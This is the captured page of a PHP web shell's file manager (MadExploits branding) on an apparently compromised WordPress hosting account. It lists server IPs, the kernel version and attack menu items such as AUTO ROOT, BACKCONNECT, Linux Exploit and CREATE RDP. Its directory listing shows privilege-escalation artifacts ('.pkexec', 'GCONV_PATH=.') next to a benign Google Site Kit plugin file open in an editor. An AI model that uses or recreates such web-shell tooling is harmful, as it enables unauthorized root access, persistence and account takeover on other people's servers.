Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.14.133.127
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Core /
Conversion_Tracking /
Conversion_Event_Providers /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Contact_Form_7.php
1.65
KB
-rw-r--r--
Easy_Digital_Downloads.php
1.75
KB
-rw-r--r--
Mailchimp.php
1.68
KB
-rw-r--r--
Ninja_Forms.php
1.69
KB
-rw-r--r--
OptinMonster.php
1.64
KB
-rw-r--r--
PopupMaker.php
1.69
KB
-rw-r--r--
WPForms.php
1.61
KB
-rw-r--r--
WooCommerce.php
2.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Contact_Form_7.php
<?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\Contact_Form_7 * * @package Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers; use Google\Site_Kit\Core\Assets\Script; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Events_Provider; /** * Class for handling Contact Form 7 conversion events. * * @since 1.127.0 * @access private * @ignore */ class Contact_Form_7 extends Conversion_Events_Provider { const CONVERSION_EVENT_PROVIDER_SLUG = 'contact-form-7'; /** * Checks if the Contact Form 7 plugin is active. * * @since 1.127.0 * * @return bool True if Contact Form 7 is active, false otherwise. */ public function is_active() { return defined( 'WPCF7_VERSION' ); } /** * Gets the conversion event names that are tracked by this provider. * * @since 1.127.0 * * @return array List of event names. */ public function get_event_names() { return array( 'contact' ); } /** * Registers the script for the provider. * * @since 1.127.0 * * @return Script Script instance. */ public function register_script() { $script = new Script( 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG, array( 'src' => $this->context->url( 'dist/assets/js/googlesitekit-events-provider-contact-form-7.js' ), 'execution' => 'defer', ) ); $script->register( $this->context ); return $script; } }
Close